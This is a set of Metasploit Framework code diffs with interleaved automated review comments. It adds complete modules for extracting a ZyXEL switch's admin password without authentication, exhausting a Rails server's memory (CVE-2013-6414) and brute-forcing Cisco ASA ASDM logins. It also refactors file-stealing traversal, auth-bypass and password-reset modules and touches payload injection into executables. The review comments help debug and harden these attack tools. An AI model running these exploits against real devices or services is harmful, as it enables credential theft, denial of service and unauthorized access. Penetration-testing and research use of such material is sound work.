@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
payload = win32_rwx_exec(code)
# Create a new PE object and run through sanity checks
endjunk = true
fsize = File.size(opts[:template])
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
text = nil
sections_end = 0
pe.sections.each do |sec|
text = sec if sec.name == ".text"
sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
endjunk = false if sec.contains_file_offset?(fsize-1)
end
#also check to see if there is a certificate
cert_entry = pe.hdr.opt['DataDirectory'][4]
#if the cert is the only thing past the sections, we can handle.
if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
endjunk = false
end
#try to inject code into executable by adding a section without affecting executable behavior
@ -1729,8 +1719,25 @@ def self.to_vba(framework,code,opts={})
def self.to_executable_fmt_formats
[
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac'
"asp",
"aspx",
"aspx-exe",
"dll",
"elf",
"exe",
"exe-only",
"exe-service",
"exe-small",
"loop-vbs",
"macho",
"msi",
"msi-nouac",
"psh",
"psh-net",
"vba",
"vba-exe",
"vbs",
"war"
]
end
@ -1757,4 +1764,3 @@ def self.to_vba(framework,code,opts={})
end
end
end


@ -329,14 +329,21 @@ class Console::CommandDispatcher::Stdapi::Sys
return true
end
# validate all the proposed pids first so we can bail if one is bogus
self_destruct = args.include?("-s")
if self_destruct
valid_pids = [client.sys.process.getpid.to_i]
else
valid_pids = validate_pids(args)
# validate all the proposed pids first so we can bail if one is bogus
args.uniq!
diff = args - valid_pids.map {|e| e.to_s}
if not diff.empty? # then we had an invalid pid
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting")
return false
end
end
# kill kill kill
print_line("Killing: #{valid_pids.join(", ").to_s}")
@ -348,8 +355,9 @@ class Console::CommandDispatcher::Stdapi::Sys
# help for the kill command
#
def cmd_kill_help
print_line("Usage: kill pid1 pid2 pid3 ...")
print_line("Usage: kill [pid1 [pid2 [pid3 ...]]] [-s]")
print_line("Terminate one or more processes.")
print_line(" -s : Kills the pid associated with the current session.")
end
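Review bot: With `-s` any pids also given on the command line are silently discarded, because `valid_pids` is set to the session pid alone and the `validate_pids` branch is skipped, yet the new usage line `kill [pid1 [pid2 [pid3 ...]]] [-s]` reads as if both may be combined. Either reject the combination with `if self_destruct && args.size > 1` → `print_error("-s cannot be combined with pids")` / `return false`, or validate `args - ['-s']` as before and append `client.sys.process.getpid.to_i` when `self_destruct` is set. Note also that `args.uniq!` now runs only in the non-`-s` branch. The kill loop that consumes `valid_pids` is outside the hunk.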
#


@ -115,6 +115,52 @@ module Text
return hexify(str, wrap, '"', '" +', "#{name} = \n", '"')
end
#
# Creates a comma separated list of numbers
#
def self.to_num(str, wrap = DefaultWrap)
code = str.unpack('C*')
buff = ""
0.upto(code.length-1) do |byte|
if(byte % 15 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.2x, ', code[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a comma separated list of dwords
#
def self.to_dword(str, wrap = DefaultWrap)
code = str
alignnr = str.length % 4
if (alignnr > 0)
code << "\x00" * (4 - alignnr)
end
codevalues = Array.new
code.split("").each_slice(4) do |chars4|
chars4 = chars4.join("")
dwordvalue = chars4.unpack('*V')
codevalues.push(dwordvalue[0])
end
buff = ""
0.upto(codevalues.length-1) do |byte|
if(byte % 8 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.8x, ', codevalues[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a ruby-style comment
#
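Review bot: `to_dword` mutates its caller's string: `code = str` aliases rather than copies, so the `code << "\x00" * (4 - alignnr)` padding is appended to the `str` the caller passed in, and a buffer transformed twice grows on each call. Copy first (`str.dup`) or build the padded string without mutation. The `chars4.unpack('*V')` template is also suspect: `V` is the little-endian 32-bit directive, and a leading `*` is not a documented directive (older Rubies skip it with a warning as far as I recall, newer ones reject unknown directives), while the split/join/unpack dance collapses to `code.unpack('V*')`. In both methods the `wrap` parameter is accepted but never read — the line width is hard-coded to 15 bytes and 8 dwords — so either honour it or drop it from the signatures.
```ruby
def self.to_dword(str, wrap = DefaultWrap)
  # Work on a copy: padding must not alter the caller's buffer.
  code = str.dup
  alignnr = code.length % 4
  code << "\x00" * (4 - alignnr) if alignnr > 0
  codevalues = code.unpack('V*')
  # … unchanged: formatting loop, chomp and return …
```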


@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return
end
@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
@traversal.gsub!(/\//, "\\")
file.gsub!(/\//, "\\")
else # unix
print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows")
print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
return
end
@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file)
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else
print_error("#{@peer} - Failed to retrieve file")
print_error("#{peer} - Failed to retrieve file")
end
end
def delete_file(file)
print_status("#{@peer} - Deleting file #{file}")
print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi(
{
@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /View Log Files/
print_good("#{@peer} - File #{file} deleted")
print_good("#{peer} - File #{file} deleted")
else
print_error("#{@peer} - Error deleting file #{file}")
print_error("#{peer} - Error deleting file #{file}")
end
end
def get_platform
print_status("#{@peer} - Retrieving platform")
print_status("#{peer} - Retrieving platform")
res = send_request_cgi(
{
@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
if res.body =~ /Windows/
print_good("#{@peer} - Windows platform found")
print_good("#{peer} - Windows platform found")
return 'windows'
elsif res.body =~ /Linux/
print_good("#{@peer} - Linux platform found")
print_good("#{peer} - Linux platform found")
return 'unix'
end
end
print_warning("#{@peer} - Platform not found, assuming UNIX flavor")
print_warning("#{peer} - Platform not found, assuming UNIX flavor")
return 'unix'
end


@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
if not has_auth
print_error("#{@peer} - No basic authentication enabled")
print_error("#{peer} - No basic authentication enabled")
return
end
bypass_string = try_auth
if bypass_string.empty?
print_error("#{@peer} - The bypass attempt did not work")
print_error("#{peer} - The bypass attempt did not work")
else
print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
end
end

View File

@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
})
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
print_status("#{@peer} - Boa Version Detected: #{m[1]}")
print_status("#{peer} - Boa Version Detected: #{m[1]}")
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
return Exploit::CheckCode::Vulnerable
else
print_status("#{@peer} - Not a Boa Server!")
print_status("#{peer} - Not a Boa Server!")
return Exploit::CheckCode::Safe # not a boa server
end
rescue Rex::ConnectionRefused
print_error("#{@peer} - Connection refused by server.")
print_error("#{peer} - Connection refused by server.")
return Exploit::CheckCode::Safe
end
end
def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable
uri = normalize_uri(target_uri.path)
@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
})
if res.nil?
print_error("#{@peer} - The server may be down")
print_error("#{peer} - The server may be down")
return
elsif res and res.code != 401
print_status("#{@peer} - #{uri} does not have basic authentication enabled")
print_status("#{peer} - #{uri} does not have basic authentication enabled")
return
end
print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
res = send_request_cgi({
'uri' => uri,
'method'=> 'GET',
@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("#{@peer} - Server timedout, will not continue")
print_error("#{peer} - Server timedout, will not continue")
return
end
case res.code
when 200
print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
when 401
print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
print_error("#{peer} - Access forbidden. The password reset attempt did not work")
else
print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
end
end


@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return
end
@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file)
print_status("#{@peer} - Copying file to Web location...")
print_status("#{peer} - Copying file to Web location...")
dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
res = send_request_cgi(
@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} copied to #{dst_path} successfully")
print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
else
print_error("#{@peer} - Failed to copy #{file} to #{dst_path}")
print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
end
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else
print_error("#{@peer} - Failed to retrieve file")
print_error("#{peer} - Failed to retrieve file")
end
# Cleanup
@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
end
def delete_file(file)
print_status("#{@peer} - Deleting file #{file}")
print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi(
{
@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} deleted")
print_good("#{peer} - File #{file} deleted")
else
print_error("#{@peer} - Error deleting file #{file}")
print_error("#{peer} - Error deleting file #{file}")
end
end


@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}"
postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s
xml = ""
xml << "<user>"
xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>"
xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run
# Clear outstanding reset tokens, helps ensure we hit the intended account.
if datastore['FLUSHTOKENS']
print_status("Clearing existing tokens...")
clear_tokens() if datastore['FLUSHTOKENS']
clear_tokens()
end
# Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL'])
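Review bot: The new `OBJECTNAME` option is interpolated unescaped into both the form key (`#{datastore['OBJECTNAME']}[email]`) and the XML element name (`<#{datastore['OBJECTNAME']}>`), and nothing constrains it to an identifier, so a value containing `<`, `&`, `=` or whitespace yields a malformed request body instead of a clear configuration error. Validate it once at the top of `run`, e.g. `unless datastore['OBJECTNAME'] =~ /\A[A-Za-z_][A-Za-z0-9_]*\z/` → `print_error("OBJECTNAME must be a plain identifier")` / `return`, which also covers the XML element name. The start of `run` is visible in the last hunk but its body continues beyond it.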


@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
travs << file
travs << "%00"
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
if is_proficy?
print_good("#{@peer} - Check successful")
print_good("#{peer} - Check successful")
else
print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found")
print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
return
end
contents = read_file(datastore['FILEPATH'])
if contents.nil?
print_error("#{@peer} - File not downloaded")
print_error("#{peer} - File not downloaded")
return
end
@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
contents,
file_name
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
print_good("#{peer} - File saved in: #{path}")
end


@ -0,0 +1,79 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'ZyXEL GS1510-16 Password Extractor',
'Description' => %q{
This module exploits a vulnerability in ZyXEL GS1510-16 routers
to extract the admin password. Due to a lack of authentication on the
webctrl.cgi script, unauthenticated attackers can recover the
administrator password for these devices. The vulnerable device
has reached end of life for support from the manufacturer, so it is
unlikely this problem will be addressed.
},
'References' =>
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
],
'Author' => [
'Daniel Manser', # @antsygeek
'Sven Vetsch' # @disenchant_ch
],
'License' => MSF_LICENSE
)
end
def run
begin
print_status("Trying to get 'admin' user password ...")
res = send_request_cgi({
'uri' => "/webctrl.cgi",
'method' => 'POST',
'vars_post' => {
'username' => "admin",
'password' => "#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}",
'action' => "cgi_login"
}
}, 10)
if (res && res.code == 200)
print_status("Got response from router.")
else
print_error('Unexpected HTTP response code.')
return
end
admin_password = ""
admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);
if not admin_password_matches
print_error('Could not obtain admin password')
return
else
admin_password = admin_password_matches[1];
print_good("Password for user 'admin' is: #{admin_password}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => "ZyXEL GS1510-16",
:user => 'admin',
:pass => admin_password,
:active => true
)
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return
end
end
end
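Review bot: The `report_auth_info` call in `run` omits the `:type => 'password'` key that the other credential-reporting modules added by this commit (Cisco ASA ASDM and Oracle ILO Manager) pass, so this credential is stored without the same tagging; add `:type => 'password'` next to `:active => true`. Two lines end in stray semicolons (`...match(/show_user\(1,"admin","(.+)"/);` and `admin_password = admin_password_matches[1];`), `admin_password = ""` is dead because the variable is always assigned before it is read, and `if not admin_password_matches` is idiomatically `unless admin_password_matches`. The `return` inside the `rescue ::Rex::ConnectionError` branch is redundant since it is the last statement of the method.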


@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in Action View that requires
a controller action. By sending a specially crafted content-type header to a rails
application, it is possible for it to store the invalid MIME type, and may eventually
consumes all memory if enough invalid MIMEs are given.
Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
},
'Author' =>
[
'Toby Hsieh', # Reported the issue
'joev', # Metasploit
'sinn3r' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-6414' ],
[ 'OSVDB', '100525' ],
[ 'BID', '64074' ],
[ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
],
'DisclosureDate' => 'Dec 04 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),
OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),
OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
],
self.class)
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def long_string
Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
end
#
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str.start_with?("/")
new_str = '/' + new_str
end
new_str
end
def http_request
uri = normalize_uri(datastore['URIPATH'])
http = ''
http << "GET #{uri} HTTP/1.1\r\n"
http << "Host: #{host}\r\n"
http << "Accept: #{long_string}\r\n"
http << "\r\n"
http
end
def run
begin
print_status("Stressing the target memory, this will take quite some time...")
datastore['RLIMIT'].times { |i|
connect
datastore['REQCOUNT'].times { sock.put(http_request) }
disconnect
}
print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
ensure
disconnect
end
end
end
=begin
Reproduce:
1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application
=end
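Review bot: In `normalize_uri`, `new_str = new_str.gsub!("//", "/") while new_str.index("//")` only works because the loop condition guarantees `gsub!` finds a match and so never returns nil, which is a fragile way to collapse slash runs; `new_str = (strs * "/").squeeze("/")` does the same without depending on the bang method's nil return. In `run`, the block parameter in `datastore['RLIMIT'].times { |i|` is unused and should be dropped or named `_`. The `ensure` branch calls `disconnect` even though every loop iteration already disconnected, which is presumably harmless but deserves a comment such as `# closes the socket left open when an exception interrupts the loop`.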


@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco ASA ASDM Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco ASA ASDM web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']),
OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco'])
], self.class)
end
def run_host(ip)
unless check_conn?
print_error("#{peer} - Connection failed, Aborting...")
return
end
unless is_app_asdm?
print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
return
end
print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.")
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
print_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return
end
end
# Verify whether we're working with ASDM or not
def is_app_asdm?
res = send_request_cgi(
{
'uri' => '/+webvpn+/index.html',
'method' => 'GET',
'agent' => 'ASDM/ Java/1.6.0_65'
})
if res &&
res.code == 200 &&
res.headers['Set-Cookie'].match(/webvpn/)
return true
else
return false
end
end
# Brute-force the login page
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi({
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'agent' => 'ASDM/ Java/1.6.0_65',
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => 'webvpnlogin=1; tg=0DefaultADMINGroup',
'vars_post' => {
'username' => user,
'password' => pass,
'tgroup' => 'DefaultADMINGroup'
}
})
if res &&
res.code == 200 &&
res.body.match(/SSL VPN Service/) &&
res.body.match(/Success/) &&
res.body.match(/success/)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco ASA ASDM',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end
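Review bot: `is_app_asdm?` calls `res.headers['Set-Cookie'].match(/webvpn/)` after checking only `res.code == 200`, so a 200 response that carries no Set-Cookie header raises NoMethodError on nil instead of returning false; `res.headers['Set-Cookie'] =~ /webvpn/` is nil-safe and gives the same truthiness. The Oracle ILO Manager module added by the same commit has the same shape in `is_app_oilom?` with `res.headers['Server'].include?("Oracle-ILOM-Web-Server")`, where `res.headers['Server'].to_s.include?(...)` would avoid the nil case. Separately, `check_conn?` returns whatever `print_good` returns on its success path, which is not a documented contract for a predicate; end the `begin` body with an explicit `true` so that `unless check_conn?` in `run_host` means what it says.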


@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
#
sid, token = get_sid_token
if sid.nil? or token.nil?
print_error("#{@peer} - Unable to obtain session ID or token, cannot continue")
print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort
else
vprint_status("#{@peer} - Using sessiond ID: #{sid}")
vprint_status("#{@peer} - Using token: #{token}")
vprint_status("#{peer} - Using sessiond ID: #{sid}")
vprint_status("#{peer} - Using token: #{token}")
end
begin
@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond")
vprint_error("#{peer} - Service failed to respond")
return :abort
end
if res.nil?
print_error("#{@peer} - Connection timed out")
print_error("#{peer} - Connection timed out")
return :abort
end
location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
:port => rport,
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
})
return :next_user
else
vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"")
vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
return
end
end
@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
}
end
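Review bot: On the new side of `run`, `@uri = target_uri.path` is followed by `@uri.path << "/" if @uri.path[-1, 1] != "/"`; if `target_uri` is the HttpClient mixin's URI object, as it appears to be, `target_uri.path` is already a String and `@uri.path` raises NoMethodError before `each_user_pass` starts. The commit only swaps `@peer` for `peer` here, but since it touches `run` this is the place to correct it, e.g. `@uri << "/" unless @uri.end_with?("/")`. The same pattern appears in the `run` method of the later file section whose first hunk starts with `'cookie' => sid` (`@uri = normalize_uri(target_uri.path)` followed by `@uri.path << "/"`). The `do_login` method reviewed in the earlier hunks of this section starts outside the hunk.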


@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
end
def accessfile
print_status("#{@peer} - Retrieving the target hostname")
print_status("#{peer} - Retrieving the target hostname")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n"
@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
end
if not host_name or host_name.empty?
print_error("#{@peer} - Failed to retrieve the host name")
print_error("#{peer} - Failed to retrieve the host name")
return
end
print_status("#{@peer} - Retrieving the file contents")
print_status("#{peer} - Retrieving the file contents")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n"
@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1
end
if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1
end
if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1)
end
if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return
end
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
end
end


@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>"
print_status("#{@peer} - Retrieving the SiteScope Configuration")
print_status("#{peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1
end
if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1
end
if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
